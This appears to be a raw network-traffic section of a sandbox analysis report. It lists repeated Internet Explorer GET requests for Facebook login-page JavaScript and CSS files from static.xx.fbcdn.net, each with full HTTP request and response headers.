                                                                                              Request
                                                                                              GET /rsrc.php/v3iF074/yG/l/en_US/bar7zWMDDHc.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Mon, 21 Oct 2024 21:13:16 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: 3Hp5CGuqRAB6wOYhEZIC/A==
                                                                                              X-FB-Debug: 1p943KKTeAPGrFxMmWqZx7FZztKUYUUm5cTrk87BBDwhp5b1ZsqsmMUyKuUboKxVmf4iu3pj3FF0OJgDY1gu7w==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 24798
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/dg2faZxOiZc.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yO/r/dg2faZxOiZc.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Fri, 18 Oct 2024 17:27:20 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: 9vN05d9CnDn5o9VAMZLeaQ==
                                                                                              X-FB-Debug: cDtXua+9kQuP26Wu9QhCEzQLBv7+Jnhu9Wuw1XeAqSHRvzaupWlxkHqq+JzKd1hi6Ch4A2lQJeIpxHkC2OZyeQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 6764
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yU/l/0,cross/lbK4l0NMzDa.css?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yU/l/0,cross/lbK4l0NMzDa.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Tue, 22 Oct 2024 18:59:19 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: Tbsjjl6b1SkGj481tGiAsQ==
                                                                                              X-FB-Debug: xcPlDTy05+3XXWSVfO26YgEcvlClGavPn98wMFf3O8kLlTIIvUYWXu/WhfPFSuyMSe3jOzrDcqPegxpBFJW+wA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 4145
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/mZAoRzDYZAy.css?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yS/l/0,cross/mZAoRzDYZAy.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Tue, 22 Oct 2024 18:59:21 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: 7lotagEWTc8aGvaNCWN0Iw==
                                                                                              X-FB-Debug: +RNezlt+m+Z7In340C2uSkYy8e5suZ3xPsyEqUmuvoFWDZdLP2VJHKBaRqlYt6fkcRVd/FGkDr6WHGnGUbFN/w==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 3831
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/yjWC116IjAc.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yE/r/yjWC116IjAc.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Mon, 21 Oct 2024 18:04:57 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: LBB3cw+JKTnfeKKOI00j+g==
                                                                                              X-FB-Debug: vjnzca/vFVbLrNQYeDUGduyEjKBeUdBpLjJAotilbBHLq80b7viRD98NI2OOYhjHFKKCzK0rISaR91KxMwTHNA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 6638
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/ui2DkP-wt_7.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yS/r/ui2DkP-wt_7.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Tue, 22 Oct 2024 22:07:25 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: iRwXQmFXehqPlYM8lrsMqg==
                                                                                              X-FB-Debug: N1jFjzguYZXXGRrqLzyA8MUQLuZLrElWdihM1MdpG8Kol2sBSsSZhrhebwnMN7+ibtQuutSXsLcRkQgtb9E24Q==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 3724
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/zI56j6esQGz.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yt/r/zI56j6esQGz.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Wed, 16 Oct 2024 01:15:55 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: 6R+oVEq1tIFjqctb9x6C0w==
                                                                                              X-FB-Debug: Y6LzXHN0lN0Qh9YG2B8IhUD1F2Xs3dHmp4I5NWfYiKVzUSCpNlIDBmQMfkA8B6nBKEDD+FS4b6qds3NTXHinQw==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 8521
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/IM8SUWd81wt.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yi/r/IM8SUWd81wt.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 17 Oct 2024 04:58:49 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: 8q/KASiz3D93m5MaVtX58w==
                                                                                              X-FB-Debug: QdIU/rLKLOyHYb+N9LMj/eC6Y6tpfHuDyLNd/WLPNlcog2yI8GpcUmhWMH2sUWGL4b8+frjzBFVIg59WEy2yfQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 58560
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yZ/l/0,cross/hbtFWKHwD29.css?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yZ/l/0,cross/hbtFWKHwD29.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Tue, 22 Oct 2024 18:59:19 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: 4v8tHHN4h4U611nKLLrWHw==
                                                                                              X-FB-Debug: bvY+CucYAxh4d7wy2GZtADZdDoirdSXeuYYpjxpplfHLgJJU9NS9GVwA2R3Om8YlKkTH1t4gQ3C3HkwQtSOjGA==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 2685
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/ALrADtg_ASu.css?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yO/l/0,cross/ALrADtg_ASu.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: text/css; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Tue, 22 Oct 2024 18:59:19 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: 5LkSmwzo6fF6qfS/0ipEXw==
                                                                                              X-FB-Debug: acAPIMa+K31qxv+Bd4/BjdTgypkpSg2G1p5lZfggWUTJQcLX5PBiaBm8c6IaXvJvieQh3pjx1T1mp+zXdOtUoQ==
                                                                                              Date: Tue, 24 Oct 2023 12:46:25 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 1364
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Sat, 19 Oct 2024 21:04:10 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              timing-allow-origin: *
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              reporting-endpoints:
                                                                                              content-md5: p1zId7RIE7NvnWFWeOhZrQ==
                                                                                              X-FB-Debug: fKtxm/V1ud4ykedHBh1LfRH0QqjAVJfQrPz5aCIG21ld7hizsrVtdpBgp8XgZ0R/1TQK72h+OmoEpm6fV8DTfg==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 592
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yv/r/N9t1W9oe3ma.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Wed, 16 Oct 2024 23:47:39 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              origin-agent-cluster: ?0
                                                                                              content-md5: mbSOjwZV3q/6hOr28/4qRA==
                                                                                              X-FB-Debug: AxftXRAsLaPyMi+5ClXZf7YbCbNwC2NxUWlAEPaZ6UvUHV0QetZjykEpM2eKxJpKWmQeWfvEJriaGS/swFWm1A==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 6030
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yw/r/DiuE6-0r1L8.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yw/r/DiuE6-0r1L8.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 17 Oct 2024 05:01:17 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: OzVTZsuhpsJL5jwYLs/bJg==
                                                                                              X-FB-Debug: coGXlHchzE7SR5VEFWBo52E/MgQvRhoYLZTtxxX6iOCRiOsueg+yhAhoX7nNjQe11SGViXSA9Jjhn2nMv764Og==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 2857
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                              Expires: Thu, 10 Oct 2024 23:50:04 GMT
                                                                                              Cache-Control: public,max-age=31536000,immutable
                                                                                              document-policy: force-load-at-top
                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                              cross-origin-resource-policy: cross-origin
                                                                                              X-Content-Type-Options: nosniff
                                                                                              timing-allow-origin: *
                                                                                              content-md5: umRfCKGsYz4LImPDjVZVWA==
                                                                                              X-FB-Debug: 66SmkUusZrdHVhijplvIcSBPQHq+ordf6zEKqblzt4TN4QXsXVUHI52sb5KdNVGdie1aShQ/5YnM1uqjLa8nXw==
                                                                                              Date: Tue, 24 Oct 2023 12:46:26 GMT
                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 1302
                                                                                            • flag-nl
                                                                                              GET
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz
                                                                                              IEXPLORE.EXE
                                                                                              Remote address:
                                                                                              157.240.201.15:443
                                                                                              Request
                                                                                              GET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://www.facebook.com/login
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: static.xx.fbcdn.net
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
